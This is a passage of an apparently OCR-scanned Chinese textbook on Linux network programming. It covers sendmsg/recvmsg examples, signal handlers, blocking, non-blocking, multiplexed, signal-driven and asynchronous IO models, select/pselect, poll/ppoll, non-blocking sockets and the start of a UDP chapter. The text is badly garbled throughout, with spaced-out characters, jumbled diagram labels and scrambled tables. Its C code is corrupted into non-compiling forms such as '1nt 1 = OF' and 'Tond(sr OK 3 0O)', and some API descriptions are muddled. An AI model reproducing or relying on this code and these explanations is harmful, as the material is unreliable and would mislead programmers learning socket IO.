08 /* 申 请 3 个 向 量 */ 

09 struct iovec*v = (struct iovec*)malloc(3*sizeof (struct iovec)) 

10 if(!1v){ 

由 printf ("Not enough memory\n"); 

2 return; 

13 } 

14 

15 /* 挂 接 全 局 变量 , 便于 释放 管理 */ 

16 VC = Vv} 

ly) /* 初 始 化 消息 */ 

18 msg.msg_name = NULL; /* 没 有 名 字 域 */ 

19 msg.msg_namelen = 0; /* 名 字 域 长 度 为 0*/ 

20 msg.msg_control = NULL; /* 没 有 控制 域 */ 

2 msg.msg_controllen = 0; /* 控 制 域 长 度 为 0*/ 

2 msg.msg_iov = Vi /* 挂 接 向 量 指针 */ 

23 msg.msg_iovlen = 30; /* 接 收 缓冲 区 长 度 为 30*/ 

24 msg.msg flags = 0; /* 无 特殊 操作 */ 

25 /* 每 个 向 量 10 个 字 节 的 空间 */ 

26 v[0] .iov base = buffer; /*0~9*/ 

2 Vv[1] .iov base = buffer + 10; /OO 

28 v[2] .iov base = buffer + 20; /*20~29*/ 

29 /* 初 始 化 长 度 为 10*/ 

30 v[0] .iov_ len = v[1].iov_ len = v[2].iov_ len = 10; 

31 

32 1nt 1 = OF 

3 Eorl(> /* 循 环 处 理 过 程 */ 

34 /* 从 标准 输入 中 读 取 数据 放 到 缓冲 区 buffer 中 */ 

EL size = read(0, v[0] .iov base, 10); 

36 if(size > 0){ /* 读 到 数据 */ 

3 v[0] .iov len= size; 

38 sendmsg(s, ég&msg,0); /* 发 送 给 服务 器 *#/ 

39 Vv[0] .iov len = v[1].iov_ len = v[2] .iov len = 10; 

40 size = recvmsg(s, &msg,0); /* 从 服务 器 读 取 数 据 #/ 

41 £0%(E = O01<321++) 1 

42 LE(vIL]. Tov Ten > oO 

43 write(1l, v[i].iov base, v[i].iov len); 
/* 写 到 标准 输出 */ 

44 } 
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3. 信号 SIGINT 的 处 理 函 数 


由 于 本 例 中 向 量 的 内 存 空间 是 动态 申请 的 ， 程 序 退 出 的 时 候 不 能 自动 释放 ， 所 以 在 信 


号 SIGINT 到 来 的 时 候 ， 先 释放 申请 的 内 存 空间 ， 再 退 


01 /* 信 号 SIGINT 的 处 理 函数 */ 

02 void sig proccess(int signo) 

O32 

04 printf ("Catch a exit signal\n"); 
05 

06 free (vc) ; 

07 free (vs) 

08 _exit(0) 

09 } 


4. 信号 SIGPIPE 的 处 理 函 数 


出 应 用 程序 。 


/* 释 放 资源 */ 


与 SIGINT 的 处 理 过 程 类 似 ， 在 信号 SIGPIPE 到 来 的 时 候 ， 其 处 理 函 数 也 是 先 释放 申 


请 的 内 存 空间 ， 再 退出 应 用 程序 。 


01  /* 信 号 SIGPIPE 的 处 理 函 数 */ 

02 void sig pipel(lint sign) 

[LE 全 

04 printf ("Catch a SIGPIPE signalNn") 
05 

06 free (vec); 

07 free (vs); 

08 _exit (0); 

|i 


9.3 
IO 的 方式 有 阻塞 IO 、 非 阻塞 IO 模型 、IO 复 用 、 
UDP 为 例 介 绍 IO 的 几 种 模型 。 
9.3.1 阻塞 IO 模型 
阻塞 IO 是 最 通 月 


/+* 释 放 资源 */ 


IO 模 型 


信号 驱动 、 异 步 IO 等 ， 本 节 中 将 以 


上 的 IO 类型， 使 用 这 种 模型 进行 数据 接收 的 时 候 ， 在 数据 没有 到 之 前 


程序 会 一 直 等 待 。 例 如 ， 对 于 函数 recvffom()， 内 核 会 一 直 阻 塞 该 请 求 直 到 有 数据 到 来 才 


返回 ， 如 图 9.7 所 示 。 


9.3.2 非 阻 塞 IO 模型 


当 把 套 接 字 设置 成 非 阻 塞 的 IJO， 则 对 每 次 请 求 ， 内 核 都 不 会 阻塞 ， 会 立即 返回 ， 当 没 
有 数据 的 时 候 ， 会 返回 一 个 错误 。 例 如 ， 对 recvfrom() 函 数 ， 前 几 次 都 没有 数据 返回 ， 直 


se 
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处 理 数据 recvfrom 


进程 受阻 于 recvfrom 系 统 调用 
返 加 系统 调用 户 空间 
执行 方向 
Y 内 核 空间 
复制 数据 阻塞 
复制 完成 没有 数据 
复制 数据 到 
用 户 空间 数据 到 来 
t 
图 9.7 阻塞 IO 模型 
到 最 后 内 核 才 向 用 户 层 的 空间 复制 数据 ， 如 图 9.8 所 示 。 
处 理 数 据 recvfrom recvfrom recvfrom 
| 进程 轮 询 数据 到 来 。 下 
返回 EMOULDBLOCK | EMOULDBLOCK 
系统 调用 系统 调用 。 | 系 纳 汕 用 用 户 空间 
| 执行 方向 | 
| 内 核 空间 
复制 数据 | 
复制 完成 
| 到 来 没有 数据 没有 数据 
复制 数据 到 
用 户 空间 
图 9.8 非 阻塞 IO 模型 
9.3.3 IO 复 用 


使 用 IO 复 用 模型 可 以 在 等 待 的 时 候 加 入 超时 的 时 间 ， 当 超时 时 间 没 有 到 达 的 时 候 与 
阻塞 的 情况 一 致 , 而 当 超时 时 间 到 达 仍 然 没 有 数据 接收 到 , 系统 会 返回 , 不 再 等 待 。select() 
函数 按照 一 定 的 超时 时 间 轮 询 ， 直 到 需要 等 待 的 套 接 字 有 数据 到 来 ， 利 用 recvfrom() 函 数 ， 


将 数据 复制 到 应 用 层 ， 如 图 9.9 所 示 。 
9.3.4 信号 驱动 IO 模型 


信号 驱动 的 IO 在 进程 开始 的 时 候 注册 一 个 信号 处 理 的 回调 函数 ， 进 程 继续 执行 ， 当 


信号 发 生 时 ， 即 有 了 IO 的 时 间 ， 这 里 就 有 数据 到 来 ， 利 用 注册 的 
recvfrom() 接 收 到 ， 如 图 9.10 所 示 。 
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进程 轮 询 数据 到 来 
处 理 数据 recvfrom select Select 
下 
返回 系统 调用 有 数据 超时 
汪 忆 | | 系 纲 调 | 系统 调用 用 户 空间 
二 执行 方向 | | 
1 内 核 空间 
复制 数据 等 待 数 | | 
之 复制 数据 到 
复制 完成 用 户 空间 数据 到 来 没有 数据 
图 9.9 IO 复 用 模型 
数据 复制 到 应 用 程序 缓冲 区 期 间 进程 阻塞 进程 轮 询 继 续 执行 
; 和 信号 SIGIO 建立 SIGIO 的 
处 理 数据 weevion | 处 理 程序 | ”| 信号 处 理 程序 
要 | 道 交 SIGIO 信 号 | 系统 调用 用 户 空间 
| | sigaction 
1 | | 内 核 空 间 
复制 数据 等 待 数据 
= es 
全 玫 训 | | 和 让 下 数据 到 来 | 。 | 没有 数据 


图 9.10 信号 驱动 IO 模型 


9.3.5 异步 IO 模型 


异步 IO 与 前 面 的 信号 驱动 IO 相似 ， 其 区 别 在 于 信号 驱动 IO 当 数 据 到 来 的 时 候 ， 使 
用 信号 通知 注册 的 信号 处 理 函 数 ， 而 异步 IO 则 在 数据 复制 完成 的 时 候 才 发 送信 号 通知 注 
册 的 信号 处 理 函 数 ， 如 图 9.11 所 示 。 


进程 继续 执行 


T | 
递交 在 aio_read 中 指定 的 信号 返回 “系统 调用 用 户 空间 
_ . : 
| 执行 方向 | 
| | 内 核 空间 
复制 数据 阻塞 
复制 完成 没有 数据 
复制 数据 到 数据 到 来 
| 数据 到 来 


图 9.11 异步 IO 模型 
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9.4 selectO 有 函数 和 pselectO 函 数 


函数 select() 和 pselect0 用 于 IO 复 用 , 它们 监视 多 个 文件 描述 符 的 集合 , 判断 是 否 有 符 
合 条 件 的 时 间 发 生 。 


9.4.1 


select() 函 数 


函数 select() 与 之 前 的 函数 recv0 和 send() 直 接 操作 文件 描述 符 不 同 。 使 用 select(O) 函 数 
可 以 先 对 需要 操作 的 文件 描述 符 进 行 查询 ， 查 看 目标 文件 描述 符 是 否 可 以 进行 读 、 写 或 者 
错误 操作 ， 然 后 当 文 件 描述 符 满 足 操作 的 条 件 的 时 候 才 进行 真正 的 IO 操作 。 


i 


函数 select() 简 介 


函数 select0 的 原型 如 下 : 


#include <sys/select.h> 

#include <sys/time.h> 

#include <sys/types.h> 

#include <unistd.h> 

int select(int nfds, fd set*readfds, fd set*writefds, 


fd_ set*exceptfds, struct timeval*timeout); 


函数 selectO) 的 参数 含义 如 下 所 述 。 


口 


口 


口 


nfds: 一 个 整 型 的 变量 ， 它 比 所 有 文件 描述 符 集合 中 的 文件 描述 符 的 最 大 值 大 1。 
使 用 select 的 时 候 必须 计算 最 大 值 的 文件 描述 的 值 ， 将 值 通过 nfds 传 入 。 

readfds: 这 个 文件 描述 符 集合 监视 文件 集中 的 任何 文件 是 否 有 数据 可 读 , 当 select() 
函数 返回 的 时 候 ，readfds 将 清除 其 中 不 可 读 的 文件 描述 符 ， 只 留 下 可 读 的 文件 描 
述 符 ， 即 可 以 被 函数 recv()、read() 等 进行 读数 据 的 操作 。 

writefds: 这 个 文件 描述 符 集合 监视 文件 集中 的 任何 文件 是 否 有 数据 可 写 , 当 select() 
函数 返回 的 时 候 ，readfds 将 清除 其 中 的 不 可 写 的 文件 描述 符 ， 只 留 下 可 写 的 文件 
描述 符 ， 即 可 以 被 send()、write() 函 数 等 进行 写 数据 的 操作 。 

exceptfds: 这 个 文件 集 将 监视 文件 集中 的 任何 文件 是 否 发 生 错误 , 其实 , 它 可 用 于 
其 他 的 用 途 。 例 如 ， 监 视 带 外 数据 OOB， 带 外 数据 使 用 MSG_OOB 标志 发 送 到 套 
接 字 上 。 当 select0) 函 数 返回 的 时 候 ，readfds 将 清除 其 中 的 其 他 文件 描述 符 ， 只 留 
下 可 读 OOB 数据 。 

timeout: 设置 在 select() 所 监视 的 文件 集合 中 的 事件 没有 发 生 时 , 最 长 的 等 待 时 间 
当 超 过 此 时 间 时 ， 函 数 会 返回 。 当 超时 时 间 为 NULL 时 ， 表 示 阻 塞 操作 ， 会 一 直 
等 待 ， 直 到 某 个 监视 的 文件 集中 的 某 个 文件 描述 符 符 合 返 回 条 件 。 当 timeout 的 值 
为 0 时 ，select 会 立即 返回 。 

sigmask: 信号 掩 码 。 


函数 select(O 返 回 值 为 0、-1 或 者 一 个 大 于 1 的 整数 值 ， 当 监视 的 文件 集中 有 文件 描述 
符 符合 要 求 ， 即 读 文 件 描述 符 集中 的 文件 可 读 、 写 文件 描述 符 中 的 文件 可 写 或 者 错误 文件 
描述 符 中 的 文件 发 生 错误 时 , 返回 值 为 大 于 0 的 正 值 ; 当 超 时 的 时 候 返 回 0; 当 返 回 值 为 -1 
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的 时 候 表示 发 生 了 错误 ， 其 错误 值 由 errno 指定 ， 值 和 含义 如 表 9.9 所 示 。 
表 9.9 select() 函 数 的 errno 值 及 含义 


含义 
| 传递 了 不 合法 参数 
没有 足够 内 存 


区 


函数 select() 和 函数 pselect() 允 许 程序 监视 多 个 文件 描述 符 ， 当 一 个 或 者 多 个 监视 的 文 
件 描述 准备 就 绪 ， 可 以 进行 IO 操作 的 时 候 返 回 。 函 数 监视 一 个 文件 描述 符 的 对 应 操作 是 
和 否 可 以 进行 ， 例 如 对 监视 读 文件 集 的 对 文件 描述 符 可 操作 。 
函数 可 以 同时 监视 3 类 文件 描述 符 。 将 监视 在 readfds 文件 描述 符 集合 中 的 文件 是 否 可 
读 ， 即 判断 对 此 文件 描述 符 进 行 读 操作 是 否 被 阻塞 ， 函 数 监视 writefds 文件 描述 符 集合 
的 文件 是 否 可 写 ， 即 判断 是 否 对 此 文件 描述 符 进行 写 操作 是 否 阻 塞 ， 另 外 ， 函数 还 监视 文 
件 描述 符 集合 exceptfds 中 的 文件 描述 符 是 否 发 生意 外 。 当 函数 退出 的 时 候 ， 上 述 的 集合 
生 了 改变 。 
当 不 需要 监视 某 种 文件 集 时 ， 可 以 将 对 应 的 文件 集 设置 为 NULL。 如 果 所 有 的 文件 集 
和 均 为 NULL， 则 表示 等 待 一 段 时 间 。 
参数 timeout 的 类 型 是 如 下 的 结构 : 
struct timeval { 
time t tv sec; /* 秒 #/ 
long tv usec; /* 微 秒 */ 
和 
口 成 员 tw_sec 表示 超时 的 秒 数 。 
口 成 员 tv_usec 表示 超时 的 微妙 数 ， 即 1/1000000s。 
有 4 个 宏 可 以 操作 文件 描述 符 的 集合 。 
口 FD_ZERO(): 清理 文件 描述 符 集合 。 
口 FD_ SETO: 向 某 个 文件 描述 符 集合 中 加 入 文件 描述 符 。 
口 FD_CLRO: 从 某 个 文件 描述 符 的 集合 中 取出 某 个 文件 描述 符 。 
口 FD_ISSET(): 测试 某 个 文件 描述 符 是 否 某 个 集合 中 的 一 员 。 


全 注意 : 文件 描述 符 的 集合 存在 最 大 的 限制 , 其 最 大 值 为 FD_SETSIZE， 当 超出 最 大 值 时 ， 
将 发 生 不 能 确定 的 事情 。 


2. select() 函 数 的 例子 


一 个 简单 的 使 用 selectO) 函 数 监视 标准 输入 是 否 有 数据 处 理 的 程序 如 下 所 示 。 函 数 
select() 监 视 标 准 输入 是 否 有 数据 输入 ， 所 设置 的 超时 时 间 为 5s。 如 果 select(O) 函 数 出 错 ， 则 
打印 出 错 信息 ; 如 果 标 准 输入 有 数据 输入 ， 则 打印 输入 信息 ; 如 果 等 待 超时 ， 则 打印 超时 
信息 。 

01 #include <stdio.h> 

02 #include <sys/time .h> 


03 #include <sys/types.h> 
04 #include <unistd.h> 
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05 int main(void) 1{ 


06 fd set rd; /* 读 文件 集 和 */ 

07 struct timeval tv; Vx* 时 间 间 隔 */ 

08 int err; /* 错 误 值 */ 

09 /* 监 视 标 准 输 入 是 否 可 以 读数 据 */ 
10 FD ZERO(&rd); 

下 再 FD SET(0，&rd) 

2 /* 设 置 5s 的 等 待 超时 */ 

13 tv.tv sec = 5; 

14 tv.tv usec = 0; 

5 err = select(1, grd, NULL, NULL, &tv); 

16 /* 函 数 返 回 , 查看 返回 条 件 */ 

ny if (err == -1) /* 出 错 */ 

18 perror("select ()"); 

19 else if (err) /* 标 准 输入 有 数据 输入 , 可 读 */ 

20 printf ("Data is available now.\n"); 

21 /*FD_ISSET (0，& rd) 的 值 为 真 */ 
22 else 

3 Printf("No data within five seconds.\n"); /* 超 时 ,没有 数据 到 达 */ 
24 return 0; 

号 呈 二 站 


9.4.2 ”pselect() 函 数 


函数 select0) 是 用 一 种 超时 轮 循 的 方式 来 查看 文件 的 读 写 错误 可 操作 性 。 在 Linux 下 ， 
还 有 一 个 相似 的 函数 pselect()。 


1. pselect() 函 数 简介 
pselect() 函 数 的 原型 如 下 : 


#include <sys/select.h> 

#include <sys/time.h> 

#include <sys/types.h> 

#include <unistd.h> 

int pselect (int nfds, fd set*readfds, fd set*writefds, 
fd set*exceptfds, const struct timespec*timeout, 
const sigset t*sigmask); 


pselect() 函 数 的 含义 基本 与 select() 函 数 一 致 ， 除 了 如 下 儿 点 : 
口 超时 的 时 间 结 构 是 一 个 纳 秒 级 的 结构 ， 原 型 如 下 所 示 。 不 过 在 Linux 平台 下 内 核 
调度 的 精度 为 10 毫秒 级 , 所 以 即使 设置 了 纳 秒 级 的 分 辨 率 , 也 达 不 到 设置 的 精度 。 
struct timespec { 
long tv sec; /* 超 时 的 秒 数 */ 
long tv nsec; /* 超 时 的 纳 秒 数 */ 
}; 
口 增加 了 进入 pselect() 函 数 时 替换 掉 的 信号 处 理 方式 ， 当 sigmask 为 NULL 的 时 候 ， 
与 select 的 方式 一 致 。 
口 select() 函 数 在 执行 之 后 可 能 会 改变 timeout 的 值 ， 修 改 为 还 有 多 少时 间 剩 余 ， 而 
pselect() 函 数 不 会 修改 该 值 。 
与 select() 函 数 相 比 ，pselect() 函 数 的 代码 如 下 : 


-a 
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ready = pselect (nfds, &readfds, &writefds, &exceptfds, 
timeout, &sigmask); 


相当 于 如 下 的 select() 函 数 , 在 进入 select0 函 数 之 前 先 手 动 将 信号 的 掩 码 改 变 , 并 保存 
之 前 的 掩 码 值 ，select() 函 数 执行 后 ， 再 恢复 为 之 前 的 信号 掩 码 值 。 

sigset t origmask; 

sigprocmask (SIG_ SETMASK, &sigmask, &origmask); 


ready = select (nfds, &readfds, &writefds, &exceptfds, timeout); 
sigprocmask (SIG SETMASK, &origmask, NULL); 


2. pselect() 函 数 的 例子 


下 面 是 一 个 使 用 pselectO) 的 简单 例子 。 在 例子 中 先 清空 信号 ， 然 后 将 SIGCHLD 信号 
加 入 到 要 处 理 的 信号 集合 中 。 设 置 pselect() 监 视 的 信号 时 ， 在 挂 载 用 户 信号 的 同时 将 系统 
原来 的 信号 保存 下 来 ， 方 便 程 序 退 出 的 时 候 恢 复原 来 的 设置 。 


int child events = 0; 
/* 信 号 处 理 函 数 */ 
void child sig handler (int x) { 
child eventstt+; /* 调 用 次 数 +1*/ 
signal (SIGCHLD，child sig handler); ”/* 重 新 设 定 信号 回调 函数 */ 


int main (int argc, char**argv) { 
/* 设 定 的 信号 掩 码 sigmask 和 原始 的 信号 掩 码 orig_sigmask*/ 
sigset t sigmask, orig sigmask; 
sigemptyset (&sigmask); /# 清 空 信号 */ 
sigaddset (&sigmask, SIGCHLD); /* 将 SIGCHLD 信号 加 入 sigmask*/ 


/* 设 定 信号 SIG_BLOCK 的 掩 码 sigmask, 并 将 原始 的 掩 码 保存 到 orig_sigmask 中 */ 
sigprocmask (SIG BLOCK，&sigmask，&orig sigmask); 
/* 挂 接 对 信号 SIGCHLD 的 处 理 函数 child_sig_handler ()*/ 
signal (SIGCHLD, child sig handler()); 
for (;;) { /* 主 循环 */ 

for (; child events > 0; child events--) { /* 判 断 是 否 退 出 */ 

/* 处 理 动作 */ 
到 
/*pselect IO 复 用 */ 
r= pselect (nfds，&rd，&wr，&er，0，&orig sigmask); 


/* 主 程序 */ 
} 


9.5 pollO 函 数 和 ppollO 函 数 


除了 使 用 select(O) 函 数 进 行文 件 描述 符 的 监视 ， 还 有 一 组 函数 也 可 以 完成 相似 的 功能 ， 
即 函 数 poll0 和 函数 ppoll()。 


9.5.1 poll() 函 数 
poll0) 函 数 等 待 某 个 文件 描述 符 上 的 某 个 事件 的 发 生 。 其 原型 如 下 : 
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#include <poll.h> 
int polll(struct pollfd*fds, nfds t nfds, int timeout); 


poll0) 函 数 监 视 在 fds 数组 指明 的 一 组 文件 描述 符 上 发 生 的 动作 ， 当 满足 条 件 或 者 超时 
的 时 候 会 退出 。 

口 参数 fds 是 一 个 指向 结构 pollfd 数组 的 指针 ， 监 视 的 文件 描述 符 和 条 件 放 在 里 面 。 

口 参数 nfds 是 比 监视 的 最 大 描述 符 的 值 大 1 的 值 。 

口 参数 timeout 是 超时 时 间 ， 单 位 为 毫秒 ， 当 为 负 值 时 ， 表 示 永 远 等 待 。 

poll0 函 数 返回 值 的 含义 如 下 所 述 。 

口 大 于 0: 表示 成 功 ,等待 的 某 个 条 件 满足 ， 返 回 值 为 满足 条 件 的 监视 文件 描述 符 的 

数量 。 
口 0: 表示 超时 。 
口 -1: 表示 发 生 错误 ，errno 的 错误 代码 如 表 9.10 所 示 。 


表 9.10 poll() 函 数 errno 的 值 及 含义 


含 义 
EBADF 参数 s 不 是 合法 描述 符 传递 了 不 合法 参数 
EINTR 接收 到 中 断 信号 没有 足够 内 存 
结构 struct pollfd 的 原型 如 下 : 


struct pollfd { 


ne Ea /* 文 件 描述 符 #/ 
short events; /* 请 求 的 事件 */ 
Short revents; /* 返 回 的 事件 */ 


js 
结构 struct pollfd 的 成 员 含义 如 下 : 
口 成 员 得 表示 监视 的 文件 描述 符 。 
口 成 员 events 表 示 输 入 的 监视 事件 ,其 值 及 含义 与 revents 的 值 及 含义 均 可 以 用 表 9.11 


所 示 的 值 和 含义 。 
口 成 员 revents 表示 返回 的 监视 事件 ， 即 返回 时 发 生 的 事件 。 
表 9.11 events 的 值 及 含义 
值 含义 含义 
POLLIN 有 数据 到 来 ， 文 件 描述 符 可 读 非法 请 求 
POLLPRI 有 紧急 数据 可 读 , 例如 带 外 数据 | POLLRDNORM | 与 POLLIN 相同 
POLLOUT 文件 可 写 POLLRDBAND ”| 优先 数据 可 读 
POLLRDHUP 流 式 套 接 字 半 关 闭 POLLWRNORM | 与 POLLOUT 相同 
POLLERR 错误 发 生 POLLWRBAND | 优先 数据 可 写 
POLLHUP 关闭 


9.5.2 ”ppoll() 函 数 
与 select() 函 数 和 pselect() 函 数 的 情况 相似 ,与 poll0 函 数 对 应 的 也 存在 一 个 ppoll() 函 数 ， 
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其 定义 如 下 : 


#include <poll.h> 
int ppoll (struct pollfd*fds, nfds t nfds, 
const struct timespec*timeout, const sigset t*sigmask); 


口 超时 时 间 timeout， 采 用 了 纳 秒 级 的 变量 。 
口 可 以 在 ppoll0) 函 数 的 处 理 过 程 中 挂 接 临时 的 信号 掩 码 。 
ppoll0 函 数 的 代码 如 下 : 


ready = ppoll(&fds, nfds, timeout, &sigmask); 
与 poll0 函 数 的 如 下 代码 一 致 : 


sigset t origmask; 

sigprocmask (SIG_ SETMASK, &sigmask, &origmask); 
ready = ppoll (&fds, nfds, timeout); 
sigprocmask (SIG SETMASK, &origmask, NULL); 


9.6 ” 非 阻塞 编 程 


前 面 介绍 的 IO 程序 设计 ， 基 本 上 都 是 基于 阻塞 方式 的 。 阻 塞 方式 的 读 写 ， 在 文件 没 
有 数据 的 时 候 ， 函 数 不 会 返回 ， 而 一 直 等 待 直到 有 数据 到 来 。 本 节 将 介绍 文件 的 非 阻塞 方 
式 程序 设计 。 
9.6.1 非 阻塞 方式 程序 设计 介绍 

非 阻塞 方式 的 操作 与 阻塞 方式 的 操作 最 大 的 不 同 点 是 函数 的 调用 立刻 返回 ， 不 管 数 据 
是 否 成 功 读 取 或 者 成 功 写 入 。 使 用 fentl0) 将 套 接 字 文件 描述 符 按照 如 下 的 代码 进行 设置 后 ， 
可 以 进行 非 阻塞 的 编程 ; 
Fentl(er F_SETFL, O_ NONBLOCK); 


其 中 的 s 是 套 接 字 文件 描述 符 ， 使 用 F_SETFL 命令 将 套 接 字 s 设置 为 非 阻塞 方式 后 ， 
再 进行 读 写 操作 就 可 以 马上 返回 了 。 


9.6.2 非 阻塞 程序 设计 的 例子 


函数 accept0 可 以 使 用 非 阻 塞 的 方式 轮 询 等 待 客户 端的 到 来 ， 在 之 前 要 设置 
O_NONBLOCK 方式 。 下面 的 代码 使 用 了 轮 询 的 方式 使 用 accept0 和 recv() 函 数 ， 当 客户 端 
发 送 HELLO 字符 串 时 , 发 送 OK 响应 给 客户 端 并 关闭 客户 端 ; 当 客 户 端 发 送 SHUTDOWN 
字符 串 给 服务 器 时 ， 服 务 器 发 送 BYE 的 客户 端 并 关闭 客户 端 ， 然 后 退出 程序 。 

01 #define PORT 9999 


02 #define BACKLOG 4 
03 int main(int argc, char*argv[]) 


04 { 
05 streuct sockaddr in local,client; 
06 int len; 
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Ant 3 3 = 1 5 C= = 
/* 初 始 化 地 址 结构 */ 
local.sin family = AF INET; 
local.sin port = htons (PORT); 
local.sin addr = hton]l (-1); 


/* 建 立 套 接 字 描述 符 */ 
ss = socket(AF INET, SOCK STREAM, 0); 
/* 设 置 非 阻塞 方式 */ 
fcntl(s_s,F_SETFL, O NONBLOCK); 
/* 侦 听 */ 
listenl(s_s, BACKLOG); 
for(;;) 
ti 
/* 轮 询 接 收 客户 端 */ 
while(s c < 0){ /* 等 待 客户 端 到 来 */ 
Ss_c =acceptl(s_ s, (struct sockaddr*)&client, &len); 


} 


/# 轮 询 接收 , 当 接收 到 数据 的 时 候 退 出 while 循环 */ 
while(recv(s_c，buffer，1024)<=0) 


/* 接 收 到 客户 端的 数据 */ 

if(strcmp (buffer, "HELLO")==0){ /* 判 断 是 否 为 HELLO 字符 串 */ 
Tond(sr OK 3 0O) /* 发 送 响 应 */ 
closel(s_c); /* 关 闭 连 接 */ 
continue; /* 继 续 等 待 客户 端 连接 */ 


} 


if (strcmp (buffer, "SHUTDOWN")==0) { /* 判 断 是 否 为 SHUTDOWN 字符 串 */ 


send(s, "BYE", 3, 0); /* 发 送 BYE 字符 串 */ 
closel(s c); /* 关 闭 客 户 端 连接 */ 
break; /* 退 出 主 循环 */ 


} 
closel(s s); 


return 0; 


全 注意 : 使 用 轮 询 的 方式 进行 查询 十 分 浪费 CPU 等 资源 ， 不 是 十 分 必要 ， 最 好 不 采用 此 
种 方法 进行 程序 设计 。 


97 小 结 


本 章 对 数据 IO 进 行 了 介绍 ,介绍 了 recv()、send()、readv()、writev()、recvmsg() 和 sendmsg() 


等 函数 的 使 


型 、IO 复 


， 并 给 出 了 多 个 例子 ， 还 介绍 了 IO 模型 ， 包 括 阻 塞 IO 模型 、 非 阻塞 IO 模 


了 


]、 信 和 号 驱动 IO 模型 和 异步 IO 模型 。select() 函 数 、pselect() 函 数 和 poll() 函 数 在 


查询 方式 程序 设计 中 经 常 使 用 ， 而 fentl() 函 数 的 O_NONBLOCK 选项 则 是 进行 非 阻 塞 编程 


中 经 常 使 
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的 设置 方法 。 
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UDP 协议 是 User Datagram Protocol 的 简写 , 它 是 无 连接 的 , 不 可 靠 的 网 络 协议 。 本 章 
将 介绍 如 何 使 用 UDP 协议 进行 程序 设计 ， 对 UDP 编程 的 基本 框架 进行 介绍 并 给 出 程序 设 
计 的 例子 。 本 章 中 使 用 比较 大 的 篇 幅 对 UDP 协议 的 程序 设计 中 容易 出 现 的 问题 进行 分 析 ， 
并 给 出 解决 的 方法 。 主 要 包括 以 下 内 容 : 

口 UDP 的 编程 框架 ,主要 介绍 进行 UDP 协议 程序 设计 时 ， 客户 端 和 服务 器 端的 两 种 


不 同 的 编程 流程 ; 
口 介绍 UDP 协议 程序 设计 常用 的 函数 , 对 函数 recv()/recvfrom()、send()/sendto() 进 行 
介绍 ; 


口 介绍 一 个 使 用 UDP 协议 进行 程序 设计 的 实例 ; 

口 分 析 使 用 UDP 协议 进行 程序 设计 时 经 常 出 现 的 问题 ， 例 如 数据 报 文 的 丢失 、 数 据 
的 乱 序 、 缺 乏 流量 控制 、 发 送 数据 时 的 外 出 接口 、 接 收 数据 时 的 数据 截断 等 ， 并 
给 出 一 些 解决 方法 。 


10.1 UDP 编程 框架 


使 用 UDP 进行 程序 设计 可 以 分 为 客户 端 和 服务 器 端 两 部 分 。 服 务 器 端 主要 包含 建立 
套 接 字 、 将 套 接 字 与 地 址 结构 进行 绑 定 、 读 写 数据 、 关 闭 套 接 字 几 个 过 程 。 客 户 端 包括 建 
立 套 接 字 、 读 写 数据 、 关 闭 套 接 字 儿 个 过 程 。 服 务 器 端 和 客户 端 两 个 流程 之 间 的 主要 差别 
在 于 对 地 址 的 绑 定 (bind()〉 函 数 ， 客 户 端 可 以 不 用 进行 地 址 和 端口 的 绑 定 操作 。 


10.1.1 UDP 编程 框图 


UDP 协议 的 程序 设计 框架 如 图 10.1 所 示 ， 客 户 端 和 服务 器 之 间 的 差别 在 于 服务 器 必 
须 使 用 bind() 函 数 来 绑 定 侦 听 的 本 地 UDP 端口 ， 而 客户 端 则 可 以 不 进行 绑 定 ， 直 接 发 送 到 
服务 器 地 址 的 某 个 端口 地 址 。 

与 TCP 程序 设计 相 比 较 , UDP 缺少 了 connect()、listen() 及 accept() 函 数 , 这 是 用 于 UDP 
协议 无 连接 的 特性 ， 不 用 维护 TCP 的 连接 、 断 开 等 状态 。 

1. UDP 协议 的 服务 器 端 流程 

UDP 协议 的 服务 器 端 程序 设计 的 流程 分 为 套 接 字 建 立 、 套 接 字 与 地 址 结构 进行 绑 定 、 
收发 数据 、 关 闭 套 接 字 等 过 程 ， 分 别 对 应 于 函数 socket()、bind()、sendto()、recvfrom() 和 


close()。 


建立 套 接 字 过 程 使 用 socket(O) 函 数 ， 这 个 过 程 与 TCP 协议 中 的 含义 相同 ， 不 过 建立 的 
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UDP 客户 端 UDP 服务 器 端 
od socket() 
一 sendto() 2 [pga 
阻塞 ， 收 到 客户 端 
客户 端 请 求 加 
Us recvfrom() 
recvfrom() om 
服务 器 应 答 
close() 
sendto() 


图 10.1 UDP 程序 设计 框架 


套 接 字 类 型 为 数据 报 套 接 字 。 地 址 结构 与 套 接 字 文 件 描述 符 进行 绑 定 的 过 程 中 , 与 TCP 协 
议 中 的 绑 定 过 程 不 同 的 是 地 址 结构 的 类 型 。 当 绑 定 操作 成 功 后 ， 可 以 调用 recvfrom() 函 数 
从 建立 的 套 接 字 接收 数据 或 者 调用 sendto0) 函 数 向 建立 的 套 接 字 发 送 网 络 数据 。 当 相关 的 
处 理 过 程 结束 后 ， 需 要 调用 close() 函 数 关闭 套 接 字 。 


2. UDP 协议 的 客户 端 流程 


UDP 协议 的 服务 器 端 程序 设计 的 流程 分 为 套 接 字 建立 、 收 发 数据 、 关 闭 套 接 字 等 过 程 ， 
分 别 对 应 于 函数 socket()、sendto()、recvfrom() 和 close()。 

建立 套 接 字 过 程 使 用 socket() 函 数 ， 这 个 过 程 与 TCP 协议 中 的 含义 相同 ， 不 过 建立 的 
套 接 字 类 型 为 数据 报 套 接 字 。 建 立 套 接 字 之 后 ， 可 以 调用 函数 sendto() 问 建立 的 套 接 字 发 
送 数据 或 者 调用 recvfrom() 函 数 从 建立 的 套 接 字 收 网 络 数据 。 当 相关 的 处 理 过 程 结束 后 ， 
需要 调用 close() 函 数 关闭 套 接 字 。 


3. UDP 协议 服务 器 和 客户 端 之 间 的 交互 


UDP 协议 中 服务 器 和 客户 端的 交互 存在 于 数据 的 收发 过 程 中 。 进行 网 络 数据 收发 的 时 
候 ， 服 务 器 和 客户 端的 数据 是 对 应 的 : 客户 端 发 送 数据 的 动作 ， 对 服务 器 来 说 是 接收 数据 
的 动作 ;客户 端 接收 数据 的 动作 ， 对 服务 器 来 说 是 发 送 数据 的 动作 。 

UDP 协议 服务 器 与 客户 端 之 间 的 交互 ， 与 TCP 协议 的 交互 相 比 较 ， 缺 少 了 二 者 之 间 
的 连接 。 这 是 由 于 UDP 协议 的 特点 决定 的 ， 因 为 UDP 协议 不 需要 流量 控制 、 不 保证 数据 
的 可 靠 性 收发 ， 所 以 不 需要 服务 器 和 客户 端 之 间 建 立 连接 的 过 程 。 
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10.1.2 UDP 服务 器 编程 框架 


